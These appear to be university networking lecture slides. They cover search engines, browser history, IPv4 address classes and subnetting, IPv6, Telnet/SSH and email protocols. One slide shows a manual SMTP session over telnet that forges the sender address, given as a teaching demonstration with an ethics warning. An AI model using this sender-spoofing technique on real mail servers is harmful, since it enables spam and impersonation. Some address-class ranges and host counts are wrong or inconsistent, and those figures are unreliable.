 150

Basic Problem Troubleshooting

• Check the Wi-Fi or the LAN is connected or
not.
• Use the Network Diagnostic tool

• Check whether wireless button is ON or OFF

• Turn ON button
• Control Panel\All Control Panel
Items\Network and Sharing Center
2016 152
 151

Popular
Search Engines
Worldwide
 152

1 - Google
• According to the latest netmarketshare report (January
2018) 74.52% of searches were powered by Google and
only 7.98% by Bing.
• Google is also dominating the mobile/tablet search engine
market share with 93%!
• Want to learn how to take advantage of Google’s search
engine share?
– Read: How long does it take to rank in Google
 153

2 - Bing
• Bing is Microsoft’s attempt to challenge Google in the area
of search.
• Despite their efforts they still did not manage to convince
users that their search engine can produce better results
than Google.
 154

3 - Yahoo! Search

• Since October 2011 Yahoo search is powered by Bing.

• Yahoo is still the most popular email provider and
according to some studies holds the fourth place in
search.
 155

4 - Ask
• Formerly known as Ask Jeeves, Ask.com receives approximately
0.05% of the search share.
• ASK is based on a question/answer format where most
questions are answered by other users or are in the form of
polls.
• It also has the general search functionality but the results
returned lack quality compared to Google or even Bing and
Yahoo.
 156

5 - Aol Search
• According to netmarketshare the old time famous AOL is
still in the top 10 search engines with a market share that
is close to 0.04%.
• The AOL network includes many popular web sites like
engadget.com, techchrunch.com and the
huffingtonpost.com.
 157

6. Baidu
• Baidu was founded in 2000 and it is the most popular
search engine in China.
• It’s market share is increasing steadily and according to
Wikipedia, Baidu is serving billion of search queries per
month.
• It is currently ranked at position 4, in the Alexa Rankings.
 158

7. Wolframalpha
• Wolframalpha is different that all the other search
engines.
• They market it as a Computational Knowledge Engine
which can give you facts and data for a number of topics.
• It can do all sorts of calculations, for example if you
enter “mortgage 2000” as input it will calculate your loan
amount, interest paid etc. based on a number of
assumptions.
 159

8. DuckDuckGo

• Has a number of advantages over the other search

engines.
– It has a clean interface, it does not track users, it is not fully
loaded with ads and has a number of very nice features (only
one page of results, you can search directly other web sites
etc).
• Update: According to duckduckgo traffic stats, as of
October 2018, duckduckgo is serving more than 30 million
searches per day.
 160

9. Internet Archive

• Blocked here at school.

• archive.org is the internet archive search engine.
• You can use it to find out how a web site looked since
1996.
• It is very useful tool if you want to trace the history of a
domain and examine how it has changed over the
years.
 161
10. Yandex.ru

• Can’t reach this page in school.

• According to Alexa, Yandex.ru is among the 30 most popular
websites on the Internet with a ranking position of 4 in
Russian.
• Yandex present themselves as a technology company that
builds intelligent products and services powered by
machine learning.
 162

Dogpile
• Since the last two don’t work, let’s try one that does.
 163

• As a final word, if you search “What is the best search engine?”

in any of the search engines listed above, you will get an answer
that Google is the best and most popular search engine and
Bing is in the second place (on a Global level).
• These are the 10 best and most popular search engines on the
Internet today.
• The list is by no means complete and for sure many more will be
created in the future but as far as the first places are concerned,
Google and Bing will hold the lead positions for years to come.
 164
What is web browser or Internet
browser ?
• A web browser or Internet browser is a software application
for retrieving, presenting, and traversing information
resources on the World Wide Web. An information resource is
identified by a Uniform Resource Identifier (URI) and may be a
web page, image, video, or other piece of content.[1]
Hyperlinks present in resources enable users to easily
navigate their browsers to related resources.
 165

What is the Technology?

• Although browsers are primarily intended to access

the World Wide Web, they can also be used to access
information provided by Web servers in private
networks or files in file systems. Some browsers can
also be used to save information resources to file
systems.
 166

Who Developed it? When? Why?

• Tim Berners-Lee developed it in December of 1990.
It was released in March, 1991.
• Interview with Tim berners-lee: Why did you invent the
WWW?

• “Well, I found it frustrating that in those days, there was

QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
different information on different computers, but you had to log
on to different computers to get at it. Also, sometimes you had
to learn a different program on each computer.” said Tim
Berners-Lee.

• People at CERN came from universities all over all types of

computers.
 167

History and Milestones

• ･WorldWideWeb. Tim Berners-Lee Christmas day, 1990.
• ･libwww. Berners-Lee and a student at CERN named
Jean-Francois Groff 1991 /1992,.
• ･Line-mode. Nicola Pellow,1991
• ･Erwise. After a visit from Robert Cailliau, a group of
students at Helsinki University of Technology joined
together to write a web browser. April, 1992.
 168

1990 Web Browser

 169

History and Milestones

• ･ViolaWWW. Pei Wei, a student at the University of

California at Berkeley, released the second browser
for Unix, called ViolaWWW, in May, 1992.
• ･Midas. Summer 1992, Tony Johnson at SLAC
developed a third browser for Unix systems.
• ･Samba. Robert Cailliau started development of the
first web browser for the Macintosh, called Samba.
Development was picked up by Nicola Pellow, and the
browser was functional by the end of 1992.
 170

History and Milestones

• Mosaic. Marc Andreessen and Eric Bina February, 1993.

• Arena. In 1993, Dave Raggett at Hewlett-Packard

• Lynx.. Lou Montulli released the web browser Lynx 2.0 in March,
1993.

• Cello. Tom Bruce, cofounder of the Legal Information Institute

developed a web browser for that platform called Cello, finished
in the summer of 1993.
 171

1993 Mosaic Browser

QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
 172

History and Milestones

• Opera. In 1994, the Opera browser was developed by a
team of researchers at a telecommunication company
called Telenor in Oslo, Norway.

• Internet in a box. January, 1994, O'Reilly and Associates

 173

History and Milestones

• ･Navipress. In February, 1994, Navisoft released a browser for the
PC and Macintosh called Navipress.

• ･Mozilla. In October, 1994, Netscape released the the first beta

version of their browser, Mozilla 0.96b, over the Internet.

• ･Internet Explorer. On August 23rd, 1995, Microsoft released their

Windows 95 operating system, including a Web browser called
Internet Explorer.
 174
What Groups are Responsible for
Managing it?
• The Information Technology group of the
company.
• Developer of the software
 175
What Groups are Responsible for
Managing it?
• Mozilla is a global community dedicated to building free, open
source products like Firefox web browser and Thunderbird email
software.

• Mozilla Firefox is a free and open source web browser descended

from the Mozilla Application Suite and managed by Mozilla
Corporation.
– Functions can be added through extensions, created by third-party
developers

• The Mozilla project was created in 1998 with the release of the
Netscape browser suite source code that was intended to harness
the creative power of thousands of programmers on the Internet.
 176
What Groups are Responsible for
Managing it?
• Instead of just working on Netscape's next browser, people started
creating a variety of browsers, development tools and a range of other
projects.

• In ten years the community has shown that commercial companies can
benefit by collaborating in open source projects and that great end user
products can be produced as open source software.

• A sustainable organization has been created that uses market

mechanisms to support a public benefit mission and this model has
been reused by others to create open, transparent and collaborative
organizations in a broad range of areas.
 177
What Groups are Responsible for
Managing it?
 178
What Groups are Responsible for
Managing it?
• WebKit is a layout engine designed to allow web
browsers to render web pages.
• It powers Google Chrome and Safari.
• The WebKit engine provides a set of classes to display
web content in windows, and implements browser
features such as following links when clicked by the
user, managing a back-forward list, and managing a
history of pages recently visited.
 179

Growth of the Web Browser

• For years, the Web browser was a
technology that seemed frozen in time.
While the Web itself exploded with new
types of content and virtual communities,
the way users accessed that material
changed hardly at all from 1997 to 2004.
 180

Growth of the Web Browser

• Of course, new versions of the most
popular Web browsers come along
regularly. Microsoft released Internet
Explorer 9 on March 14; Mozilla upgraded
Firefox to version 4 on March 22
 181

Growth of the Web Browser

• Browster, for example, offers a free add-on
for Internet Explorer and the Mozilla
Foundation's open-source Firefox browser
that's a simpler alternative to using the
"Back" button.
 182

Growth of the Web Browser

 183

Growth of the Web Browser

• A plugin for Internet Explorer and Firefox, lets
users preview other Web pages without
leaving the current one, by moving a cursor
over an icon appearing above each link.
 184

Growth of the Web Browser

• companies like Flock are developing entirely new
browsers to facilitate now-common social activities,
such as blogging, RSS-based news reading, and photo
sharing.
• Not only can you use it on the computer, but it is
now integrated into mobile devices, DVD players, and
video game counsels.
 185
Related and Competing
Technologies
• Apps, social networks

QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
 186

Pros and Cons

• FireFox
– Pros: Fast, very customizable, uses fewer system
resources than most
– Cons: So many options can be confusing, crash on
one tab crashes all, private browsing requires add-
in, many other features require add-ins
 187

Pros and Cons

• Google
– Pros: Fast and simple, stable, private browsing
option, enables offline use of Internet apps
– Cons: No ad blocking, minimal options, skimpy
bookmarking, uses a lot of system resources
 188

Pros and Cons

• Opera
– Pros: Doesn’t bog down older computers,
excellent history of searching, synchronize across
computers
– Cons: No ad blocking, not the fastest, no private
browsing
 189
Creation of Accessibility Limitations
and Improvements
• The browser as operating system,
• Functionally-limited mobile applications,
• Web-enhanced devices,
• Personalization.
 190

Pushing the Limits

• Flock 2.5
• Firefox 5
• Internet Explorer 9
• Web Os
• Chrome Os
 191

Future Technology
• Worldwide Market Shares
• Influence of Google Chrome
• Competition amongst Web Browsers
 192
Addressing
An IP address is 32-bit long.
• It is usually written as four decimal numbers separated by
dots (periods) (dotted decimal notation)
• In hex, each of the four hexadecimal numbers is called an
octet.
• Example: 137.207.192.003 or 89 CF C0 03
• An IP address contains a network part and a host part.
• The number of address bits used to identify the network, and
the number to identify the host, vary according to the class of
the address.
• Routers or gateways have one or more addresses
(depending on the no. of links they have) The three main
address classes are class A, class B, and class C.
• By examining the first few bits of an address, IP software can
quickly determine the address class, and therefore its structure.
 IP Addressing 193

Note:
For Class A: Have a first dotted decimal number in the range 1-126
For Class B: Have a first dotted decimal number in the range 128-191
For Class C: Have a first dotted decimal number in the range 192-223
 194
IP Addressing
• There are five forms of IP addresses:
Class A :126 networks, each can have up to (16M-2) nodes.
(1.0.0.0 - 126.0.0.0)
Class B: (16K-2) networks, each can have up to (64K-2) nodes
(127.0.0.0 - 191.255.0.0)
Class C: (2M-2) networks, each can have up to 254 nodes.
(192.0.0.0 - 223.255.255.0)
Class D: a multicast address.
(224.0.0.0 - 240.0.0.0)
Class E: reserved for future use.
(241.0.0.0 - 248.0.0.0)
 195
IP address format
 196

IP address

For example:
The address (binary) - 10000000 00000111 00001111 00000001
has the DECIMAL DOT NOTATION: 128.7.15.1
It belongs to Class B addresses.
Its Network-id is: 128.7
Its Host-id is: 15.1
 197
IP Addresses assignment example
 198

Class A

If the first bit of an IP address is 0, it is the address of a class A network.

The first bit of a class A address identifies the address class.
The next seven bits identify the network, and
the last 24 bits identify the host.
There are fewer than 128 class A network numbers, but each class A
network can have millions of hosts.
 199
Class A
|_| first one bit is used to determine the class to which an address
belongs to for Class A address.

|_______| 7 bits are used for Network address.Therefore, the

number of class A networks can be 2 7 = 128. Number 0 is not used,
and number 127 is used for testing loopback for each host. There are
126 potential Class A network numbers, which have a first dotted
decimal number in the range 1 to 126.
|________________________| 24 bits are used for host address.
Therefore, each Class A network can have 2 24 = 16,777,216 hosts.
Class A is not available to the general public, and it is restricted to
special uses.

Class A final format:

|_|_______| |________________________|

7 bits 24 bits
Network Host
Part Part
 200

Class A

Summary:

• If the the first decimal number in IP address is 1 to

126, then it is a class A address.
• The first byte is for the network number, and the next three
• bytes are for the host addresses.
 201

Class B

• If the first two bits of the address are 1and 0, it is a class B

network address.
• The first two bits identify class; the next fourteen
bits identify the network, and the last sixteen bits
identify the host.
• There are thousands of class B network numbers.
• Each class B network can have thousands of hosts.
 202

Class B
|__| first two bits are used to determine the class to which an address
belongs to for class B address.

|______________| 14 (6 + 8) bits are used for network address.

Therefore, the number of class B networks can be 2 14 = 16,384. There are
16,384 potential Class B network numbers, which have a first dotted
decimal number in the range 128 to 191.

|________________| 16 bits are used for host address. Therefore, each

Class B network can have 2 16 = 65,536 hosts.
 203
Class B

Class B final format

|__|______|________| |________________|
14 bits Network part 16 bits Host part
Summary:

• If the the first decimal number in IP address is 128 to

191, then it is a class B address.
• The first two bytes identify the network.
• The last two bytes identify the host.
 204

Class C

• If the first three bits of the address are 1 1 0, it is a

class C network address.
• The first three bits are class identifiers.
• The next 21 bits are for the network address.
• The last eight bits identify the host.
• There are millions of class C network numbers.
• However, each class C network can have 254 hosts.
 205
Class C

|___| first three bits are used to determine the class to which an
address belongs to for class C address.

|_____|________|________| 21 (5 + 16) bits are used for network

address. Therefore, the number of class C networks can be 2 21 = 2,
097,152. There are 2,097,152 potential Class C network numbers,
which have a first dotted decimal number in the range 192 to 223.

|________| 8 bits are used for host address. Therefore, each Class C
network can have 2 8 = 256 hosts.
 206
Class C

Class C final format

|___|_____| |________| |________| |________|

21 bits Network part 8 bits host part

Summary:

• If the the first decimal number in IP address is 192 to

223, then it is a class C address.
• The first three bytes are for the network address.
• The last byte is for the host number.
 207

Summary
• Class A:Few networks, each with many hosts.
• Class B: Medium number of networks, each
with a medium number of hosts
• Class C: Many networks, each with a few
hosts.
 208

Loopback Address
• IP defines a loopback address used to test network applications.
• Programmers often use loopback testing for preliminary
debugging after a network application has been created.
• To perform a loopback test, a programmer must have two
application programs that are intended to communicate across a
network.
• Each application includes the code needed to interact with
TCP/IP protocol software.
• Instead of executing each program on a separate computer, the
programmer runs both programs on a single computer and
instructs them to use a loopback IP address when
communicating.
 209

Loopback Address
• When one application sends data to another, data travels
down the protocol stack to the IP software and then IP
software forwards it up through the protocol stack to the
second program.
• Thus programmer can test the program logic quickly
without using two computers and without sending packets
across the network.
• During loopback testing, packets do not leave a computer
and the Ip sofware forwards the packets from one
application to another application.
• The loopback address never appears in a packet travelling
across a network.
 210

Limited Broadcast Address

• Refers to a broadcast on a local physical network.
• Informally, the broadcast is limited to a “single wire”.
• Limited broadcast is used during startup by a
computer that does not yet know the network
number.
• IP reserves the address consisting of all 1 bits to
refer to limited broadcast.
• IP will broadcast any packet sent to the all-ones
address across the local network.
 211

Use of different Class addresses

• In some environment, it may be best to use
addresses all from one class.
• For example, a corporate internet that consists of
a large number of departmental LANs may need
to use Class C addresses exclusively.
• However, the format of the addresses allow us to
mix all three classes of the addresses on the same
internet. Example: Internet.
• We will prefer a mixture of classes for an internet
consisting of a few large networks, many small
networks, plus some medium-sized networks.
 212

Address Depletion
• The TCP/IP designers did not think about the enormous scale of
today's network.
• When TCP/IP was being designed, networking was limited to
large organizations that could afford substantial computer
systems.
• The idea of a powerful UNIX system on every desktop, or X-
terminal or a PC with X-Ware (PC software to emulate X-
terminal) did not exist.
• At That time, a 32-bit address seemed so large that it was
divided into classes to reduce the processing load on routers.
 213
Address Depletion
• For example, assigning a large network a single class B address,
instead of few class C addresses, reduces the load on the router,
because the router only needs to keep one route for that entire
organization.
• However, the organization that was given the class B address
probably does not have 64,000 computers, so most of the host
addresses available to the organization will never be assigned.
• The current design, which favors routers over growth, is under
critical strain from the rapid growth of the Internet. At the present
rate of growth, all class B addresses could be exhausted soon!.
• To prevent this, blocks of class C addresses are being assigned to
organizations, but each class C address requires its own entry
within the routing table.
• This solution could cause the routing table to grow so rapidly that
the routers will soon be overwhelmed.
 214
Address Depletion
These problems are being addressed by the ROAD (Routing and Addressing)
working group of the Internet Engineering Task Force (IETF). They are looking for a
scheme that:
• It will improve the problem of address depletion,
perhaps by moving to a larger address, 160-bit address!
• Classless addresses.
• Implementation of new routers, without requiring
changes to the end-systems (the hosts).
We don't know what technique will be adopted by the IETF to overcome the
problems of address depletion. However, according to them, whatever happens,
the changes should not have any near-term effect on your hosts, and IP
addressing will be same at least for some time.
 215

Why subnetting?
• Preservation of address space
• Control network traffic, avoid collisions
• Reduce the routing complexity
• Improve network performance
• Security
 216

Subnetting
Subnetting is a method for getting the most out of the limited 32-bit IP addressing
space. With any address class, subnetting provides a mean of allocating a part of the
host address space to network addresses, which will let you have more networks. The
part of the host address space allocated to new network addresses is known as the
subnet number.

The InterNIC assigned the University of Windsor one class B Network address, which is
137.207.0.0 with network number part 137.207. The Host number part is left to be
assigned by the local management - The Computing Services)
 217

Subnetting
 218
Subnetting
• In class B IP address, the 2 right-hand bytes assigned for the host
number, can be subdivided into 254 subnetworks and 254 hosts to
each subnetwork number.
• Which bits in the host address bytes will be applied to subnet
addresses and which to host addresses is determined by a subnet
mask, or netmask.(/etc/netmasks)
• The netmask can be applied to an IP address using the bitwise
logical AND operator.
• If a netmask 255.255.255.0 (or FF.FF.FF.00) is applied to the
address 137.207.192.003 (or 89 CF C0 03), the result is a network
number 137.207.192.0
i.e.: 137.207.192.003 & 255.255.255.000
= 137.207.192.000
or, 89 CF C0 03 & FF FF FF 00
= 89 CF C0 00.
 Subnetting 219

In binary form, the operation is:

10001001 11001111 11000000 00000011 (IP address )
AND
11111111 11111111 11111111 00000000 (netmask)
------------------------------------------------------------------------

10001001 11001111 11000000 00000000 (masked number)

Now the system (router or server) will look for a network number of 137.207.192.000
instead of a network number of 137.207., then the router (or the server) will locate the
host (workstation) from its table, and adds the corresponding machine number to get
137.207.192.003. To increase the host number from 254, a different mask number could
be used for less subnetworks and more hosts.
 220

Default subnet masks:

Class A - 255.0.0.0 - 11111111.00000000.00000000.00000000

Class B - 255.255.0.0 - 11111111.11111111.00000000.00000000
Class C - 255.255.255.0 - 11111111.11111111.11111111.00000000
 221
Subnetting
 222
IP Subnetting
• Subnetting is a technique used to allow a single IP
network address to span multiple physical networks.
IP hosts should support subnetting.
• Subnetting is done by using some of the bits of the
host-id part of the IP address as a physical network
identifier.
• The subnet mask is used to determine the bits of the
network identifier.
• All hosts on the same network should have the same
subnet mask.
 223
IP - The Next Generation (IPng - IPv6)
• The growing number of INTERNET hosts causes a shortage in IP
addresses and will eventually consume the entire address space.
• The theoretical address space size (2^32 nodes) is largely wasted
due to assignment inefficiencies.
• Dividing the address space into classes (A, B and C) had its own
contribution to the inefficiency of addresses assignment.
• Changing the IP addressing scheme is a matter concerning all
INTERNET users and is an opportunity for providing additional
functionality to the IP.
• The new version of IP is often referred to as IPng:
"INTERNET Protocol: The Next Generation".
Most INTERNET users agreed IPng should have a hierarchical
address structure. This new address structure should be large
enough to meet the needs of the INTERNET community for a
very long time.
 224
IP - The Next Generation (IPng - IPv6)
• There were several proposals for IPng. The most likely to
become a standard were: "Common Architecture for the
INTERNET" (CATNIP) "Simple INTERNET Protocol Plus" (SIPP),
and "The TCP/UDP Over CLNP-Addressed Networks (TUBA)
proposals.
• The guidelines for choosing one proposals over the others were:
 Current address assignment policies should not be changed.
 There is no need to reclaim assigned network numbers
 There is no need to renumber most of the INTERNET

Eventually the "Simple INTERNET Protocol Plus (SIPP) Spec.

(128 bit ver)" was adopted as the basis for IPng.

IPng was assigned the name IPv6.

 225

IPng - IPv6 addressing

• IPng offers a larger address space for the INTERNET users.

• The IP address size will be increased from 32 bits to 128
bits.
• This change will allow a much bigger number of nodes
than is available today, with more levels of addressing
hierarchy, and simpler auto-configuration of addresses.
• An address size of 128 bits is large enough to support a
huge number of nodes even with the inefficiency of
address assignment.
 226

IPv6 addressing: IP header

• The IP header will be changed.

• Some fields will be removed in order to keep the overhead
low (in spite of increasing the number of address bits).
• Thus, even though the IPv6 addresses are
four times longer than the IPv4 addresses, the IPv6 header
is only twice the size of the IPv4 header.
• A new function in IPv6 is source routing, which together
with Cluster addresses will allow nodes to control their
routing in a more precise way.
 227
Upgrading IPv4 to IPng - IPv6
• The transition from IPv4 to IPv6 will be simple and
flexible.
• The upgrade will be Incremental: existing IPv4 hosts
and routers may be upgraded to IPv6 and new hosts
and routers can be installed independently.
• When existing IPv4 hosts or routers are upgraded, they
can continue to use their current address.
• The start-up costs are low and little work is needed to
upgrade existing systems to IPv6.
228
 229

How the Internet Works

• TCP/IP

• Routing Traffic Across the Internet

• Addressing Schemes

• Domains and Subdomains

 230

How the Internet Works - TCP/IP

• Every computer and network on the Internet uses the same protocols
(rules and procedures) to control timing and data format.

• The protocol used by the Internet is the Transmission Control

Protocol/Internet Protocol, or TCP/IP.

• No matter what type of computer system you connect to the Internet, if

it uses TCP/IP, it can exchange data with any other type of computer.
 231
How the Internet Works -
Routing Traffic Across the Internet
• Most computers don't connect directly to the Internet. Instead, they
connect to a smaller network that is connected to the Internet backbone.

• The Internet includes thousands of host computers (servers), which

provide data and services as requested by client systems.

• When you use the Internet, your PC (a client) requests data from a host
system. The request and data are broken into packets and travel across
multiple networks before being reassembled at their destination.
 232

The Operation of the Internet

• Packets of information flow between machines governed by common rules
(protocols):
– Internet protocol (IP)
– Transport control protocol (TCP)
• Internet is a packet-switching network
– Messages are decomposed into packets, containing part of the
message, plus information on the sending and receiving machines
and how the packet relates to the other packets
– Packets travel independently and possibly on different routes
through the Internet
– Packets are reassembled into the message at the receiving
machine.
233
 234

How the Internet Works -

Addressing Schemes
• In order to communicate across the Internet, a computer must have a
unique address.

• Every computer on the Internet has a unique numeric identifier, called

an Internet Protocol (IP) address.

• Each IP address has four parts – each part a number between 0 and 255.
An IP address might look like this: 205.46.117.104.
 235

Where to Begin? Internet Addresses

• Because the Internet is a global network of computers each

computer connected to the Internet must have a unique
address. Internet addresses are in the
form nnn.nnn.nnn.nnn where nnn must be a number from 0 -
255. This address is known as an IP address. (IP stands for
Internet Protocol; more on this later.)
• The picture below illustrates two computers connected to the
Internet; your computer with IP address 1.2.3.4 and another
computer with IP address 5.6.7.8. The Internet is represented
as an abstract object in-between.
 236

• If you connect to the Internet through an Internet Service

Provider (ISP), you are usually assigned a temporary IP
address for the duration of your dial-in session. If you
connect to the Internet from a local area network (LAN)
your computer might have a permanent IP address or it
might obtain a temporary one from a DHCP (Dynamic
Host Configuration Protocol) server. In any case, if you are
connected to the Internet, your computer has a unique IP
address.
 237

Check It Out - The Ping Program

IF you're using Microsoft Windows or a flavor of Unix and have a

connection to the Internet, there is a handy program to see if a
computer on the Internet is alive. It's called ping, probably after
the sound made by older submarine sonar systems.If you are
using Windows, start a command prompt window. If you're using
a flavor of Unix, get to a command prompt. Type ping
www.yahoo.com. The ping program will send a 'ping' (actually an
ICMP (Internet Control Message Protocol) echo request message)
to the named computer. The pinged computer will respond with a
reply. The ping program will count the time expired until the reply
comes back (if it does). Also, if you enter a domain name (i.e.
www.yahoo.com) instead of an IP address, ping will resolve the
domain name and display the computer's IP address. More on
domain names and address resolution later.
 238
Protocol Stacks and Packets
So your computer is connected to the Internet and has a unique
address. How does it 'talk' to other computers connected to the
Internet? An example should serve here: Let's say your IP address is
1.2.3.4 and you want to send a message to the computer 5.6.7.8. The
message you want to send is "Hello computer 5.6.7.8!". Obviously,
the message must be transmitted over whatever kind of wire
connects your computer to the Internet. Let's say you've dialed into
your ISP from home and the message must be transmitted over the
phone line. Therefore the message must be translated from
alphabetic text into electronic signals, transmitted over the Internet,
then translated back into alphabetic text. How is this accomplished?
Through the use of a protocol stack. Every computer needs one to
communicate on the Internet and it is usually built into the
computer's operating system (i.e. Windows, Unix, etc.). The protocol
stack used on the Internet is referred to as the TCP/IP protocol stack
because of the two major communication protocols used. The TCP/IP
stack looks like this:
 239
Protocol LayerComments
LayerProtocols specific to applications such as WWW, e-mail,
Application Protocols FTP, etc.
TCP directs packets to a specific application on a computer
Transmission Control using a port number.
Protocol Layer
IP directs packets to a specific computer using an IP address.
Internet Protocol Layer
Converts binary packet data to network signals and back.
Hardware Layer (E.g. ethernet network card, modem for phone lines, etc.)
 240

How the Internet Works -

Domains and Subdomains
• In addition to an IP address, most Internet hosts or servers have a Domain
Name System (DNS) address, which uses words.

• A domain name identifies the type of institution that owns the computer.
An Internet server owned by IBM might have the domain name ibm.com.

• Some enterprises have multiple servers, and identify them with

subdomains, such as products.ibm.com.
241
 242

Major Features of the Internet

• The World Wide Web

• E-Mail

• News

• Telnet

• File Transfer Protocol (FTP)

• Internet Relay Chat (IRC)

 243

Major Features of the Internet -

The World Wide Web
• The World Wide Web is a part of the Internet, which supports hypertext
documents, allowing users to view and navigate different types of data.
• A Web page is a document encoded with hypertext markup language (HTML)
tags.

• HTML allows designers to link content together via hyperlinks.

• Every Web page has an address, a Uniform Resource Locator (URL).

 244

This address is for an

Internet server that uses This site belongs to a
The hypertext transfer protocol. company named Glencoe.

This site is on the part To find the specific Web pages

of the Internet known that accompany this book, your
as the World Wide Web. browser follows the URL’s path
to a folder named “norton,” then
to a subfolder named “online.”
 245

Major Features of the Internet - E-Mail

• Electronic mail (e-mail) is the most popular reason people use the
Internet.

• To create, send, and receive e-mail messages, you need an e-mail

program and an account on an Internet mail server with a domain name.

• To use e-mail, a user must have an e-mail address, which you create by
adding your user name to the
e-mail server's domain name, as in [email protected].
 246
Example of Telnet (Character mode)

26.248
Image from Dr. Wang’s course at:
http://www.cse.scu.edu/~mwang2/tcpip/
 247
Some Common Features of Telnet

• Telnet is on a single TCP connection to port 23

• Telnet connection is unencrypted
• So easy for eavesdropper!
• In most cases, telnet is a remote terminal. Each character is transmitted in a
separated packet
• The same is true for SSH login stage
• A feature that could be exploited for “timing attack”.

26.249
 248
Telnet Commands

• telnet longwood.eecs.ucf.edu (eecs email server)

• setup a remote shell to the server
• It will be denied since most Unix servers nowadays do not support telnet
• telnet longwood.eecs.ucf.edu 25
• Setup a TCP connection to port 25 (email service)
• We will show this usage in Email lecture

26.250
 249
SSH – Secure Shell

• Replacement of old unsecure Telnet program

• Both ends authenticate with each other
• Rely on public key cryptography
• Will introduce PK in last chapter
• All communication messages are encrypted

• SSH is used also as a secure tunneling channel for other applications

• File transfer
• Port forwarding (such as X window)
• Virtual private network (VPN)

26.251
 250
SSH – Secure Shell

• Under Unix machine:

• Hidden directory .ssh saves all configuration files
• “known_hosts” saves public keys of all previous connected SSH servers
• Attacker cannot impersonates as a known SSH server anymore
• Have to trust what you get in the first connection attempt

26.252
 251
SSH Programs and Usages

• Many open source ssh client software

• http://en.wikipedia.org/wiki/Comparison_of_SSH_clients
• PuTTY

• SSH uses TCP connection on port 22

• Login methods:
• Password
• private key kept on client, public key stored on server (come to this in
later security chapter)

26.253
 252
26-2 ELECTRONIC MAIL

One of the most popular Internet services is electronic

mail (e-mail). The designers of the Internet probably
never imagined the popularity of this application
program. Its architecture consists of several components
that we discuss in this chapter.

Topics discussed in this section:

Architecture
User Agent
Message Transfer Agent: SMTP
Message Access Agent: POP and IMAP
Web-Based Mail
26.254
 253

Figure 26.6 First scenario in electronic mail

MUA: mail user agent

26.255
 254

Note
When the sender and the receiver of an e-mail are on the same system,
we need only two user agents.

MUA:Outlook Express, Netscape Messenger, Mozilla Thunderbird, Eudora,

Foxmail,…….

26.256
 255

Note
When the sender and the receiver of an e-mail are on different systems, Wikipidia
shows a good example of email operation (next page)

26.257
 256
Typical Email Operation (from Wikipidia)

Could also be IMAP4

Email server’s DNS

DNS query for MX RR
26.258 name and IP
 257
Client’s Email Operation Mode

• Remote terminal using SSH to email server directly

• Then uses MUA on email server
• Such as Pine, Elm on Unix machines
• Use MUA on a client’s own computer
• The MUA formats and sends email to sender’s email server
• Web-based email systems using web browser
• Gmail, yahoo mail, hotmail,….
• Spammer: program a simple code sending email to email servers via SMTP protocol

26.259
 258

Figure 26.11 Services of user agent

26.260
 259

Note
Some examples of command-driven user agents are mail, pine,
and elm (under Unix).

26.261
 260

Note
Some examples of GUI-based user agents are Eudora, Outlook, and Netscape.

26.262
 261
Figure 26.12 Format of an e-mail

26.263
 262

Figure 26.13 E-mail address

• Sender uses DNS query for MX record on the domain name in order to find the
name and IP of the target email server

26.264
 263

Figure 26.14 MIME (Multipurpose Internet Mail Extensions)

NVT: network virtual terminal

(telnet)

SMTP protocol only this data

26.265
 264

MIME

• User agents makes the translation between non-ASCII data and ASCII email
message
• If you check the source file of an email that has attachment, you will find the MIME
usage
• This is the main reason why your email with an attachment becomes bigger?

26.266
 265

Figure 26.15 MIME header

26.267
 266
Table 26.5 Data types and subtypes in MIME

26.268
 267

Table 26.6 Content-transfer-encoding

26.269
 268

Figure 26.16 SMTP (Simple Mail Transfer Protocol) range

POP3 or IMAP4

26.270
 269

Figure 26.17 Commands and responses

26.271
 270

Figure 26.18 Command format

26.272
 Table 26.7 Commands 271

26.273
 272
Table 26.8 Responses

26.274
 273
Table 26.8 Responses (continued)

26.275
 Example 26.3
274

Let us see how we can directly use SMTP to send an

e-mail and simulate the commands and responses we
described in this section. We use TELNET to log into port
25 (the service port for SMTP). We then use the commands
directly to send an e-mail.

Through this process, you can see why you cannot trust the
“sender” or any part of a received email, why email spam
is so easy to be generated.

26.276
 275
Sample email sending using telnet
“telnet longwood.cs.ucf.edu 25”
C: HELO fake.domain
S: 250 Hello crepes.fr, pleased to meet you
C: MAIL FROM: <[email protected]>
S: 250 [email protected]... Sender ok
C: RCPT TO: <[email protected]>
S: 250 [email protected] ... Recipient ok
C: DATA
S: 354 Enter mail, end with "." on a line by itself
C: from: “fake man” <[email protected]>
C: to: “dr. who” <who@who>
C: subject: who am I?
C: Do you like ketchup?
C: How about pickles?
C: .
S: 250 Message accepted for delivery
C: QUIT
S: 221 longwood.cs.ucf.edu closing connection
 276

Try SMTP interaction for yourself:

• telnet servername 25
• see 220 reply from server
• enter HELO, MAIL FROM, RCPT TO, DATA, QUIT commands
– “mail from” the domain may need to be existed
– “rcpt to” the user needs to be existed
– A mail server may or may not support “relay”
Enable you send email without using email user agent
 277

What is “email open relay”?

• An open mail relay is an SMTP server configured in such a
way that it allows anyone on the Internet to send e-mail
through it, not just mail destined to or originating from known
users.
• This used to be the default configuration in many mail servers
and it was the way the Internet was initially set up
• But open mail relays have become unpopular due to their
exploitation by spammers. Many relays were closed, or were
placed on blacklists by other servers.

From wikipiedia: http://en.wikipedia.org/wiki/Open_mail_relay

26.279
 278

Email Server in Our Department

• EECS email server: longwood.eecs.ucf.edu

• Before this year, CS email server supports
relay from inside campus
– You can use telnet to send manual email from any
computer inside campus network
– Now it is more restrict, only support relay from
some fixed computers (such as eustis Unix
machine)
– Eustis machine: eustis.eecs.ucf.edu

26.280
 279

NOTES: Ethnical Issue on Manual Sending Email

• Do not try to use telnet on department email server except for the homework!
• Do not try to use it to spam your friends without upfront notice!

26.281
 280

Figure 26.19 POP3 (Post Office Protocol) and IMAP4 (Internet Mail Access
Protocol)

26.282
 281
Figure 26.20 The exchange of commands and responses in POP3

26.283
 282
POP3 protocol (tcp: 110)
S: +OK POP3 server ready
C: user bob
authorization phase S: +OK
C: pass hungry
• client commands:
S: +OK user successfully logged on
– user: declare username
– pass: password C: list
S: 1 498 Length(bytes)
• server responses S: 2 912
– +OK S: .
– -ERR C: retr 1
S: <message 1 contents>
transaction phase, client: S: .
• list: list message numbers C: dele 1
• retr: retrieve message by C: retr 2
number S: <message 1 contents>
• dele: delete S: .
